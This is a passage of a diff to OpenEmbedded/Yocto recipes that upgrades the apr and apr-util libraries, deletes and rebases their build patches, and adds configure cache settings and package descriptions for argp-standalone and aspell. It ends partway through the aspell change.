diff --git a/meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch b/meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch
deleted file mode 100644
index 57e7453312..0000000000
--- a/meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch
+++ /dev/null
@@ -1,135 +0,0 @@
-From 6b638fa9afbeb54dfa19378e391465a5284ce1ad Mon Sep 17 00:00:00 2001
-From: Changqing Li <changqing.li@windriver.com>
-Date: Wed, 12 Sep 2018 17:16:36 +0800
-Subject: [PATCH] Fix error handling in gdbm
-
-Only check for gdbm_errno if the return value of the called gdbm_*
-function says so. This fixes apr-util with gdbm 1.14, which does not
-seem to always reset gdbm_errno.
-
-Also make the gdbm driver return error codes starting with
-APR_OS_START_USEERR instead of always returning APR_EGENERAL. This is
-what the berkleydb driver already does.
-
-Also ensure that dsize is 0 if dptr == NULL.
-
-Upstream-Status: Backport[https://svn.apache.org/viewvc?
-view=revision&amp;revision=1825311]
-
-Signed-off-by: Changqing Li <changqing.li@windriver.com>
----
- dbm/apr_dbm_gdbm.c | 47 +++++++++++++++++++++++++++++------------------
- 1 file changed, 29 insertions(+), 18 deletions(-)
-
-diff --git a/dbm/apr_dbm_gdbm.c b/dbm/apr_dbm_gdbm.c
-index 749447a..1c86327 100644
---- a/dbm/apr_dbm_gdbm.c
-+++ b/dbm/apr_dbm_gdbm.c
-@@ -36,13 +36,25 @@
- static apr_status_t g2s(int gerr)
- {
-     if (gerr == -1) {
--        /* ### need to fix this */
--        return APR_EGENERAL;
-+        if (gdbm_errno == GDBM_NO_ERROR)
-+           return APR_SUCCESS;
-+        return APR_OS_START_USEERR + gdbm_errno;
-     }
- 
-     return APR_SUCCESS;
- }
- 
-+static apr_status_t gdat2s(datum d)
-+{
-+    if (d.dptr == NULL) {
-+        if (gdbm_errno == GDBM_NO_ERROR || gdbm_errno == GDBM_ITEM_NOT_FOUND)
-+           return APR_SUCCESS;
-+        return APR_OS_START_USEERR + gdbm_errno;
-+   }
-+
-+    return APR_SUCCESS;
-+}
-+
- static apr_status_t datum_cleanup(void *dptr)
- {
-     if (dptr)
-@@ -53,22 +65,15 @@ static apr_status_t datum_cleanup(void *dptr)
- 
- static apr_status_t set_error(apr_dbm_t *dbm, apr_status_t dbm_said)
- {
--    apr_status_t rv = APR_SUCCESS;
- 
--    /* ### ignore whatever the DBM said (dbm_said); ask it explicitly */
-+    dbm->errcode = dbm_said;  
- 
--    if ((dbm->errcode = gdbm_errno) == GDBM_NO_ERROR) {
-+    if (dbm_said == APR_SUCCESS)
-         dbm->errmsg = NULL;
--    }
--    else {
--        dbm->errmsg = gdbm_strerror(gdbm_errno);
--        rv = APR_EGENERAL;        /* ### need something better */
--    }
--
--    /* captured it. clear it now. */
--    gdbm_errno = GDBM_NO_ERROR;
-+    else
-+        dbm->errmsg = gdbm_strerror(dbm_said - APR_OS_START_USEERR);
- 
--    return rv;
-+    return dbm_said;
- }
- 
- /* --------------------------------------------------------------------------
-@@ -107,7 +112,7 @@ static apr_status_t vt_gdbm_open(apr_dbm_t **pdb, const char *pathname,
-                      NULL);
- 
-     if (file == NULL)
--        return APR_EGENERAL;      /* ### need a better error */
-+        return APR_OS_START_USEERR + gdbm_errno;   /* ### need a better error */
- 
-     /* we have an open database... return it */
-     *pdb = apr_pcalloc(pool, sizeof(**pdb));
-@@ -141,10 +146,12 @@ static apr_status_t vt_gdbm_fetch(apr_dbm_t *dbm, apr_datum_t key,
-     if (pvalue->dptr)
-         apr_pool_cleanup_register(dbm->pool, pvalue->dptr, datum_cleanup,
-                                   apr_pool_cleanup_null);
-+    else
-+       pvalue->dsize = 0;
- 
-     /* store the error info into DBM, and return a status code. Also, note
-        that *pvalue should have been cleared on error. */
--    return set_error(dbm, APR_SUCCESS);
-+    return set_error(dbm, gdat2s(rd));
- }
- 
- static apr_status_t vt_gdbm_store(apr_dbm_t *dbm, apr_datum_t key,
-@@ -201,9 +208,11 @@ static apr_status_t vt_gdbm_firstkey(apr_dbm_t *dbm, apr_datum_t *pkey)
-     if (pkey->dptr)
-         apr_pool_cleanup_register(dbm->pool, pkey->dptr, datum_cleanup,
-                                   apr_pool_cleanup_null);
-+    else
-+        pkey->dsize = 0;
- 
-     /* store any error info into DBM, and return a status code. */
--    return set_error(dbm, APR_SUCCESS);
-+    return set_error(dbm, gdat2s(rd));
- }
- 
- static apr_status_t vt_gdbm_nextkey(apr_dbm_t *dbm, apr_datum_t *pkey)
-@@ -221,9 +230,11 @@ static apr_status_t vt_gdbm_nextkey(apr_dbm_t *dbm, apr_datum_t *pkey)
-     if (pkey->dptr)
-         apr_pool_cleanup_register(dbm->pool, pkey->dptr, datum_cleanup,
-                                   apr_pool_cleanup_null);
-+    else
-+       pkey->dsize = 0;
- 
-     /* store any error info into DBM, and return a status code. */
--    return set_error(dbm, APR_SUCCESS);
-+    return set_error(dbm, gdat2s(rd));
- }
- 
- static void vt_gdbm_freedatum(apr_dbm_t *dbm, apr_datum_t data)
--- 
-2.7.4
-
diff --git a/meta/recipes-support/apr/apr-util_1.6.1.bb b/meta/recipes-support/apr/apr-util_1.6.3.bb
index 0dd8f025e8..3d9d619c7b 100644
--- a/meta/recipes-support/apr/apr-util_1.6.1.bb
+++ b/meta/recipes-support/apr/apr-util_1.6.3.bb
@@ -13,16 +13,13 @@ SRC_URI = "${APACHE_MIRROR}/apr/${BPN}-${PV}.tar.gz \
            file://configfix.patch \
            file://configure_fixes.patch \
            file://run-ptest \
-           file://0001-Fix-error-handling-in-gdbm.patch \
-"
+           "
 
-SRC_URI[md5sum] = "bd502b9a8670a8012c4d90c31a84955f"
-SRC_URI[sha256sum] = "b65e40713da57d004123b6319828be7f1273fbc6490e145874ee1177e112c459"
+SRC_URI[sha256sum] = "2b74d8932703826862ca305b094eef2983c27b39d5c9414442e9976a9acf1983"
 
-EXTRA_OECONF = "--with-apr=${STAGING_BINDIR_CROSS}/apr-1-config \ 
+EXTRA_OECONF = "--with-apr=${STAGING_BINDIR_CROSS}/apr-1-config \
 		--without-odbc \
 		--without-pgsql \
-		--with-dbm=gdbm \
 		--without-sqlite2 \
 		--with-expat=${STAGING_DIR_HOST}${prefix}"
 
@@ -36,6 +33,7 @@ OE_BINCONFIG_EXTRA_MANGLE = " -e 's:location=source:location=installed:'"
 do_configure_append() {
 	if [ "${CLASSOVERRIDE}" = "class-target" ]; then
 		cp ${STAGING_DATADIR}/apr/apr_rules.mk ${B}/build/rules.mk
+		sed -i -e 's#^CFLAGS=.*#CFLAGS=${TARGET_CFLAGS}#g' ${B}/build/rules.mk
 	fi
 }
 do_configure_prepend_class-native() {
@@ -50,6 +48,7 @@ do_configure_append_class-native() {
 
 do_configure_prepend_class-nativesdk() {
 	cp ${STAGING_DATADIR}/apr/apr_rules.mk ${S}/build/rules.mk
+	sed -i -e 's#^CFLAGS=.*#CFLAGS=${TARGET_CFLAGS}#g' ${S}/build/rules.mk
 }
 
 do_configure_append_class-nativesdk() {
@@ -69,7 +68,7 @@ PACKAGECONFIG ??= "crypto gdbm"
 PACKAGECONFIG[ldap] = "--with-ldap,--without-ldap,openldap"
 PACKAGECONFIG[crypto] = "--with-openssl=${STAGING_DIR_HOST}${prefix} --with-crypto,--without-crypto,openssl"
 PACKAGECONFIG[sqlite3] = "--with-sqlite3=${STAGING_DIR_HOST}${prefix},--without-sqlite3,sqlite3"
-PACKAGECONFIG[gdbm] = "--with-gdbm=${STAGING_DIR_HOST}${prefix},--without-gdbm,gdbm"
+PACKAGECONFIG[gdbm] = "--with-dbm=gdbm --with-gdbm=${STAGING_DIR_HOST}${prefix},--without-gdbm,gdbm"
 
 #files ${libdir}/apr-util-1/*.so are not symlinks but loadable modules thus they are packaged in ${PN}
 FILES_${PN}     += "${libdir}/apr-util-1/apr*${SOLIBS} ${libdir}/apr-util-1/apr*${SOLIBSDEV}"
diff --git a/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch b/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch
index abff4e9331..a274f3a16e 100644
--- a/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch
+++ b/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch
@@ -1,14 +1,15 @@
-From 2bbe20b4f69e84e7a18bc79d382486953f479328 Mon Sep 17 00:00:00 2001
+From 225abf37cd0b49960664b59f08e515a4c4ea5ad0 Mon Sep 17 00:00:00 2001
 From: Jeremy Puhlman <jpuhlman@mvista.com>
 Date: Thu, 26 Mar 2020 18:30:36 +0000
 Subject: [PATCH] Add option to disable timed dependant tests
 
-The disabled tests rely on timing to pass correctly. On a virtualized 
+The disabled tests rely on timing to pass correctly. On a virtualized
 system under heavy load, these tests randomly fail because they miss
 a timer or other timing related issues.
 
 Upstream-Status: Pending
 Signed-off-by: Jeremy Puhlman <jpuhlman@mvista.com>
+
 ---
  configure.in     | 6 ++++++
  include/apr.h.in | 1 +
@@ -16,10 +17,10 @@ Signed-off-by: Jeremy Puhlman <jpuhlman@mvista.com>
  3 files changed, 9 insertions(+), 2 deletions(-)
 
 diff --git a/configure.in b/configure.in
-index d9f32d6..f0c5661 100644
+index bfd488b..3663220 100644
 --- a/configure.in
 +++ b/configure.in
-@@ -2886,6 +2886,12 @@ AC_ARG_ENABLE(timedlocks,
+@@ -3023,6 +3023,12 @@ AC_ARG_ENABLE(timedlocks,
  )
  AC_SUBST(apr_has_timedlocks)
  
@@ -45,10 +46,10 @@ index ee99def..c46a5f4 100644
  #define APR_PROCATTR_USER_SET_REQUIRES_PASSWORD @apr_procattr_user_set_requires_password@
  
 diff --git a/test/testlock.c b/test/testlock.c
-index a43f477..6233d0b 100644
+index e3437c1..04e01b9 100644
 --- a/test/testlock.c
 +++ b/test/testlock.c
-@@ -396,13 +396,13 @@ abts_suite *testlock(abts_suite *suite)
+@@ -535,7 +535,7 @@ abts_suite *testlock(abts_suite *suite)
      abts_run_test(suite, threads_not_impl, NULL);
  #else
      abts_run_test(suite, test_thread_mutex, NULL);
@@ -56,6 +57,8 @@ index a43f477..6233d0b 100644
 +#if APR_HAS_TIMEDLOCKS && APR_HAVE_TIME_DEPENDANT_TESTS
      abts_run_test(suite, test_thread_timedmutex, NULL);
  #endif
+     abts_run_test(suite, test_thread_nestedmutex, NULL);
+@@ -543,7 +543,7 @@ abts_suite *testlock(abts_suite *suite)
      abts_run_test(suite, test_thread_rwlock, NULL);
      abts_run_test(suite, test_cond, NULL);
      abts_run_test(suite, test_timeoutcond, NULL);
@@ -63,7 +66,4 @@ index a43f477..6233d0b 100644
 +#if APR_HAS_TIMEDLOCKS && APR_HAVE_TIME_DEPENDANT_TESTS
      abts_run_test(suite, test_timeoutmutex, NULL);
  #endif
- #endif
--- 
-2.23.0
-
+ #ifdef WIN32
diff --git a/meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch b/meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch
new file mode 100644
index 0000000000..a78b16284f
--- /dev/null
+++ b/meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch
@@ -0,0 +1,58 @@
+From 316b81c462f065927d7fec56aadd5c8cb94d1cf0 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Fri, 26 Aug 2022 00:28:08 -0700
+Subject: [PATCH] configure: Remove runtime test for mmap that can map
+ /dev/zero
+
+This never works for cross-compile moreover it ends up disabling
+ac_cv_file__dev_zero which then results in compiler errors in shared
+mutexes
+
+Upstream-Status: Inappropriate [Cross-compile specific]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+
+---
+ configure.in | 30 ------------------------------
+ 1 file changed, 30 deletions(-)
+
+diff --git a/configure.in b/configure.in
+index 3663220..dce9789 100644
+--- a/configure.in
++++ b/configure.in
+@@ -1303,36 +1303,6 @@ AC_CHECK_FUNCS([mmap munmap shm_open shm_unlink shmget shmat shmdt shmctl \
+ APR_CHECK_DEFINE(MAP_ANON, sys/mman.h)
+ AC_CHECK_FILE(/dev/zero)
+ 
+-# Not all systems can mmap /dev/zero (such as HP-UX).  Check for that.
+-if test "$ac_cv_func_mmap" = "yes" &&
+-  test "$ac_cv_file__dev_zero" = "yes"; then
+-    AC_CACHE_CHECK([for mmap that can map /dev/zero],
+-    [ac_cv_mmap__dev_zero],
+-    [AC_TRY_RUN([#include <sys/types.h>
+-#include <sys/stat.h>
+-#include <fcntl.h>
+-#ifdef HAVE_SYS_MMAN_H
+-#include <sys/mman.h>
+-#endif
+-    int main()
+-    {
+-        int fd;
+-        void *m;
+-        fd = open("/dev/zero", O_RDWR);
+-        if (fd < 0) {
+-            return 1;
+-        }
+-        m = mmap(0, sizeof(void*), PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
+-        if (m == (void *)-1) {  /* aka MAP_FAILED */
+-            return 2;
+-        }
+-        if (munmap(m, sizeof(void*)) < 0) {
+-            return 3;
+-        }
+-        return 0;
+-    }], [], [ac_cv_file__dev_zero=no], [ac_cv_file__dev_zero=no])])
+-fi
+-
+ # Now we determine which one is our anonymous shmem preference.
+ haveshmgetanon="0"
+ havemmapzero="0"
diff --git a/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch b/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch
index 72e706f966..d63423f3a1 100644
--- a/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch
+++ b/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch
@@ -1,8 +1,7 @@
-From 5925b20da8bbc34d9bf5a5dca123ef38864d43c6 Mon Sep 17 00:00:00 2001
+From 689a8db96a6d1e1cae9cbfb35d05ac82140a6555 Mon Sep 17 00:00:00 2001
 From: Hongxu Jia <hongxu.jia@windriver.com>
 Date: Tue, 30 Jan 2018 09:39:06 +0800
-Subject: [PATCH 2/7] apr: Remove workdir path references from installed apr
- files
+Subject: [PATCH] apr: Remove workdir path references from installed apr files
 
 Upstream-Status: Inappropriate [configuration]
 
@@ -14,20 +13,23 @@ packages at target run time, the workdir path caused confusion.
 Rebase to 1.6.3
 
 Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
+
 ---
- apr-config.in | 26 ++------------------------
- 1 file changed, 2 insertions(+), 24 deletions(-)
+ apr-config.in | 32 ++------------------------------
+ 1 file changed, 2 insertions(+), 30 deletions(-)
 
 diff --git a/apr-config.in b/apr-config.in
-index 84b4073..bbbf651 100644
+index bed47ca..47874e5 100644
 --- a/apr-config.in
 +++ b/apr-config.in
-@@ -152,14 +152,7 @@ while test $# -gt 0; do
+@@ -164,16 +164,7 @@ while test $# -gt 0; do
      flags="$flags $LDFLAGS"
      ;;
      --includes)
 -    if test "$location" = "installed"; then
          flags="$flags -I$includedir $EXTRA_INCLUDES"
+-    elif test "$location" = "crosscompile"; then
+-        flags="$flags -I$APR_TARGET_DIR/$includedir $EXTRA_INCLUDES"
 -    elif test "$location" = "source"; then
 -        flags="$flags -I$APR_SOURCE_DIR/include $EXTRA_INCLUDES"
 -    else
@@ -37,13 +39,15 @@ index 84b4073..bbbf651 100644
      ;;
      --srcdir)
      echo $APR_SOURCE_DIR
-@@ -181,29 +174,14 @@ while test $# -gt 0; do
+@@ -197,33 +188,14 @@ while test $# -gt 0; do
      exit 0
      ;;
      --link-ld)
 -    if test "$location" = "installed"; then
 -        ### avoid using -L if libdir is a "standard" location like /usr/lib
 -        flags="$flags -L$libdir -l${APR_LIBNAME}"
+-    elif test "$location" = "crosscompile"; then
+-        flags="$flags -L$APR_TARGET_DIR/$libdir -l${APR_LIBNAME}"
 -    else
 -        ### this surely can't work since the library is in .libs?
 -        flags="$flags -L$APR_BUILD_DIR -l${APR_LIBNAME}"
@@ -62,6 +66,8 @@ index 84b4073..bbbf651 100644
 -        # Since the user is specifying they are linking with libtool, we
 -        # *know* that -R will be recognized by libtool.
 -        flags="$flags -L$libdir -R$libdir -l${APR_LIBNAME}"
+-    elif test "$location" = "crosscompile"; then
+-        flags="$flags  -L${APR_TARGET_DIR}/$libdir  -l${APR_LIBNAME}"
 -    else
 -        flags="$flags $LA_FILE"
 -    fi
@@ -69,6 +75,3 @@ index 84b4073..bbbf651 100644
      ;;
      --shlib-path-var)
      echo "$SHLIBPATH_VAR"
--- 
-1.8.3.1
-
diff --git a/meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch b/meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch
deleted file mode 100644
index 4dd53bd8eb..0000000000
--- a/meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch
+++ /dev/null
@@ -1,63 +0,0 @@
-From d5028c10f156c224475b340cfb1ba025d6797243 Mon Sep 17 00:00:00 2001
-From: Hongxu Jia <hongxu.jia@windriver.com>
-Date: Fri, 2 Feb 2018 15:51:42 +0800
-Subject: [PATCH 3/7] Makefile.in/configure.in: support cross compiling
-
-While cross compiling, the tools/gen_test_char could not
-be executed at build time, use AX_PROG_CC_FOR_BUILD to
-build native tools/gen_test_char
-
-Upstream-Status: Submitted [https://github.com/apache/apr/pull/8]
-
-Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
----
- Makefile.in  | 10 +++-------
- configure.in |  3 +++
- 2 files changed, 6 insertions(+), 7 deletions(-)
-
-diff --git a/Makefile.in b/Makefile.in
-index 5fb760e..8675f90 100644
---- a/Makefile.in
-+++ b/Makefile.in
-@@ -46,7 +46,7 @@ LT_VERSION = @LT_VERSION@
- 
- CLEAN_TARGETS = apr-config.out apr.exp exports.c export_vars.c .make.dirs \
- 	build/apr_rules.out tools/gen_test_char@EXEEXT@ \
--	tools/gen_test_char.o tools/gen_test_char.lo \
-+	tools/gen_test_char.o \
- 	include/private/apr_escape_test_char.h
- DISTCLEAN_TARGETS = config.cache config.log config.status \
- 	include/apr.h include/arch/unix/apr_private.h \
-@@ -131,13 +131,9 @@ check: $(TARGET_LIB)
- etags:
- 	etags `find . -name '*.[ch]'`
- 
--OBJECTS_gen_test_char = tools/gen_test_char.lo $(LOCAL_LIBS)
--tools/gen_test_char.lo: tools/gen_test_char.c
-+tools/gen_test_char@EXEEXT@: tools/gen_test_char.c
- 	$(APR_MKDIR) tools
--	$(LT_COMPILE)
--
--tools/gen_test_char@EXEEXT@: $(OBJECTS_gen_test_char)
--	$(LINK_PROG) $(OBJECTS_gen_test_char) $(ALL_LIBS)
-+	$(CC_FOR_BUILD) $(CFLAGS_FOR_BUILD) $< -o $@
- 
- include/private/apr_escape_test_char.h: tools/gen_test_char@EXEEXT@
- 	$(APR_MKDIR) include/private
-diff --git a/configure.in b/configure.in
-index 719f331..361120f 100644
---- a/configure.in
-+++ b/configure.in
-@@ -183,6 +183,9 @@ dnl can only be used once within a configure script, so this prevents a
- dnl preload section from invoking the macro to get compiler info.
- AC_PROG_CC
- 
-+dnl Check build CC for gen_test_char compiling which is executed at build time.
-+AX_PROG_CC_FOR_BUILD
-+
- dnl AC_PROG_SED is only avaliable in recent autoconf versions.
- dnl Use AC_CHECK_PROG instead if AC_PROG_SED is not present.
- ifdef([AC_PROG_SED],
--- 
-1.8.3.1
-
diff --git a/meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch b/meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch
deleted file mode 100644
index d1a2ebe881..0000000000
--- a/meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From 49661ea3858cf8494926cccf57d3e8c6dcb47117 Mon Sep 17 00:00:00 2001
-From: Dengke Du <dengke.du@windriver.com>
-Date: Wed, 14 Dec 2016 18:13:08 +0800
-Subject: [PATCH] apr: fix off_t size doesn't match in glibc when cross
- compiling
-
-In configure.in, it contains the following:
-
-	APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], off_t, 8)
-
-the macro "APR_CHECK_SIZEOF_EXTENDED" was defined in build/apr_common.m4,
-it use the "AC_TRY_RUN" macro, this macro let the off_t to 8, when cross
-compiling enable.
-
-So it was hardcoded for cross compiling, we should detect it dynamic based on
-the sysroot's glibc. We change it to the following:
-
-	AC_CHECK_SIZEOF(off_t)
-
-The same for the following hardcoded types for cross compiling:
-
-	pid_t	8
-	ssize_t	8
-	size_t	8
-	off_t	8
-
-Change the above correspondingly.
-
-Signed-off-by: Dengke Du <dengke.du@windriver.com>
-
-Upstream-Status: Pending
-
----
- configure.in | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/configure.in b/configure.in
-index 27b8539..fb408d1 100644
---- a/configure.in
-+++ b/configure.in
-@@ -1801,7 +1801,7 @@ else
-     socklen_t_value="int"
- fi
- 
--APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], pid_t, 8)
-+AC_CHECK_SIZEOF(pid_t)
- 
- if test "$ac_cv_sizeof_pid_t" = "$ac_cv_sizeof_short"; then
-     pid_t_fmt='#define APR_PID_T_FMT "hd"'
-@@ -1873,7 +1873,7 @@ APR_CHECK_TYPES_FMT_COMPATIBLE(size_t, unsigned long, lu, [size_t_fmt="lu"], [
- APR_CHECK_TYPES_FMT_COMPATIBLE(size_t, unsigned int, u, [size_t_fmt="u"])
- ])
- 
--APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], ssize_t, 8)
-+AC_CHECK_SIZEOF(ssize_t)
- 
- dnl the else cases below should no longer occur;
- AC_MSG_CHECKING([which format to use for apr_ssize_t])
-@@ -1891,7 +1891,7 @@ fi
- 
- ssize_t_fmt="#define APR_SSIZE_T_FMT \"$ssize_t_fmt\""
- 
--APR_CHECK_SIZEOF_EXTENDED([#include <stddef.h>], size_t, 8)
-+AC_CHECK_SIZEOF(size_t)
- 
- # else cases below should no longer occur;
- AC_MSG_CHECKING([which format to use for apr_size_t])
-@@ -1909,7 +1909,7 @@ fi
- 
- size_t_fmt="#define APR_SIZE_T_FMT \"$size_t_fmt\""
- 
--APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], off_t, 8)
-+AC_CHECK_SIZEOF(off_t)
- 
- if test "${ac_cv_sizeof_off_t}${apr_cv_use_lfs64}" = "4yes"; then
-     # Enable LFS
diff --git a/meta/recipes-support/apr/apr/libtoolize_check.patch b/meta/recipes-support/apr/apr/libtoolize_check.patch
index 740792e6b0..80ce43caa4 100644
--- a/meta/recipes-support/apr/apr/libtoolize_check.patch
+++ b/meta/recipes-support/apr/apr/libtoolize_check.patch
@@ -1,6 +1,7 @@
+From 17835709bc55657b7af1f7c99b3f572b819cf97e Mon Sep 17 00:00:00 2001
 From: Helmut Grohne <helmut@subdivi.de>
-Subject: check for libtoolize rather than libtool
-Last-Update: 2014-09-19
+Date: Tue, 7 Feb 2023 07:04:00 +0000
+Subject: [PATCH] check for libtoolize rather than libtool
 
 libtool is now in package libtool-bin, but apr only needs libtoolize.
 
@@ -8,14 +9,22 @@ Upstream-Status: Pending [ from debian: https://sources.debian.org/data/main/a/a
 
 Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
 
---- apr.orig/build/buildcheck.sh
-+++ apr/build/buildcheck.sh
-@@ -39,11 +39,11 @@ fi
+---
+ build/buildcheck.sh | 10 ++++------
+ 1 file changed, 4 insertions(+), 6 deletions(-)
+
+diff --git a/build/buildcheck.sh b/build/buildcheck.sh
+index 44921b5..08bc8a8 100755
+--- a/build/buildcheck.sh
++++ b/build/buildcheck.sh
+@@ -39,13 +39,11 @@ fi
  # ltmain.sh (GNU libtool 1.1361 2004/01/02 23:10:52) 1.5a
  # output is multiline from 1.5 onwards
  
 -# Require libtool 1.4 or newer
--libtool=`build/PrintPath glibtool1 glibtool libtool libtool15 libtool14`
+-if test -z "$libtool"; then
+-  libtool=`build/PrintPath glibtool1 glibtool libtool libtool15 libtool14`
+-fi
 -lt_pversion=`$libtool --version 2>/dev/null|sed -e 's/([^)]*)//g;s/^[^0-9]*//;s/[- ].*//g;q'`
 +# Require libtoolize 1.4 or newer
 +libtoolize=`build/PrintPath glibtoolize1 glibtoolize libtoolize libtoolize15 libtoolize14`
diff --git a/meta/recipes-support/apr/apr_1.7.0.bb b/meta/recipes-support/apr/apr_1.7.2.bb
index 7073af8c98..807dce21da 100644
--- a/meta/recipes-support/apr/apr_1.7.0.bb
+++ b/meta/recipes-support/apr/apr_1.7.2.bb
@@ -1,4 +1,8 @@
 SUMMARY = "Apache Portable Runtime (APR) library"
+
+DESCRIPTION = "Create and maintain software libraries that provide a predictable \
+and consistent interface to underlying platform-specific implementations."
+
 HOMEPAGE = "http://apr.apache.org/"
 SECTION = "libs"
 DEPENDS = "util-linux"
@@ -12,17 +16,15 @@ BBCLASSEXTEND = "native nativesdk"
 SRC_URI = "${APACHE_MIRROR}/apr/${BPN}-${PV}.tar.bz2 \
            file://run-ptest \
            file://0002-apr-Remove-workdir-path-references-from-installed-ap.patch \
-           file://0003-Makefile.in-configure.in-support-cross-compiling.patch \
            file://0004-Fix-packet-discards-HTTP-redirect.patch \
            file://0005-configure.in-fix-LTFLAGS-to-make-it-work-with-ccache.patch \
-           file://0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch \
            file://0007-explicitly-link-libapr-against-phtread-to-make-gold-.patch \
            file://libtoolize_check.patch \
            file://0001-Add-option-to-disable-timed-dependant-tests.patch \
+           file://0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch \
            "
 
-SRC_URI[md5sum] = "7a14a83d664e87599ea25ff4432e48a7"
-SRC_URI[sha256sum] = "e2e148f0b2e99b8e5c6caa09f6d4fb4dd3e83f744aa72a952f94f5a14436f7ea"
+SRC_URI[sha256sum] = "75e77cc86776c030c0a5c408dfbd0bf2a0b75eed5351e52d5439fa1e5509a43e"
 
 inherit autotools-brokensep lib_package binconfig multilib_header ptest multilib_script
 
@@ -30,17 +32,30 @@ OE_BINCONFIG_EXTRA_MANGLE = " -e 's:location=source:location=installed:'"
 
 # Added to fix some issues with cmake. Refer to https://github.com/bmwcarit/meta-ros/issues/68#issuecomment-19896928
 CACHED_CONFIGUREVARS += "apr_cv_mutex_recursive=yes"
-
+# Enable largefile
+CACHED_CONFIGUREVARS += "apr_cv_use_lfs64=yes"
+# Additional AC_TRY_RUN tests which will need to be cached for cross compile
+CACHED_CONFIGUREVARS += "apr_cv_epoll=yes epoll_create1=yes apr_cv_sock_cloexec=yes \
+    ac_cv_struct_rlimit=yes \
+    ac_cv_func_sem_open=yes \
+    apr_cv_process_shared_works=yes \
+    apr_cv_mutex_robust_shared=yes \
+    "
 # Also suppress trying to use sctp.
 #
 CACHED_CONFIGUREVARS += "ac_cv_header_netinet_sctp_h=no ac_cv_header_netinet_sctp_uio_h=no"
 
-CACHED_CONFIGUREVARS += "ac_cv_sizeof_struct_iovec=yes"
+# ac_cv_sizeof_struct_iovec is deduced using runtime check which will fail during cross-compile
+CACHED_CONFIGUREVARS += "${@['ac_cv_sizeof_struct_iovec=16','ac_cv_sizeof_struct_iovec=8'][d.getVar('SITEINFO_BITS') != '32']}"
+
 CACHED_CONFIGUREVARS += "ac_cv_file__dev_zero=yes"
 
+CACHED_CONFIGUREVARS:append:libc-musl = " ac_cv_strerror_r_rc_int=yes"
 PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'ipv6', d)}"
+PACKAGECONFIG:append:libc-musl = " xsi-strerror"
 PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6,"
 PACKAGECONFIG[timed-tests] = "--enable-timed-tests,--disable-timed-tests,"
+PACKAGECONFIG[xsi-strerror] = "ac_cv_strerror_r_rc_int=yes,ac_cv_strerror_r_rc_int=no,"
 
 do_configure_prepend() {
 	# Avoid absolute paths for grep since it causes failures
diff --git a/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb b/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb
index 21bbcab3d3..d1db562bb5 100644
--- a/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb
+++ b/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb
@@ -2,6 +2,7 @@
 # Released under the MIT license (see COPYING.MIT for the terms)
 
 SUMMARY = "Glibc hierarchical argument parsing standalone library"
+DESCRIPTION = "Standalone version of arguments parsing functions from GLIBC"
 HOMEPAGE = "http://www.lysator.liu.se/~nisse/misc/"
 LICENSE = "LGPL-2.1"
 LIC_FILES_CHKSUM = "file://argp.h;beginline=1;endline=20;md5=008b7e53dea6f9e1d9fdef0d9cf3184a"
diff --git a/meta/recipes-support/aspell/aspell_0.60.8.bb b/meta/recipes-support/aspell/aspell_0.60.8.bb
index 629987810a..9147c820e7 100644
--- a/meta/recipes-support/aspell/aspell_0.60.8.bb
+++ b/meta/recipes-support/aspell/aspell_0.60.8.bb
@@ -1,10 +1,21 @@
 SUMMARY = "GNU Aspell spell-checker"
+
+DESCRIPTION = "Spell checker designed to eventually replace Ispell. \
+It can either be used as a library or as an independent spell checker. \
+Its main feature is that it does a superior job of suggesting possible \
+replacements for a misspelled word than just about any other spell \
+checker out there for the English language."
+
 SECTION = "console/utils"
 
+HOMEPAGE = "http://aspell.net/"
+
 LICENSE = "LGPLv2 | LGPLv2.1"
 LIC_FILES_CHKSUM = "file://COPYING;md5=7fbc338309ac38fefcd64b04bb903e34"
 
-SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz"
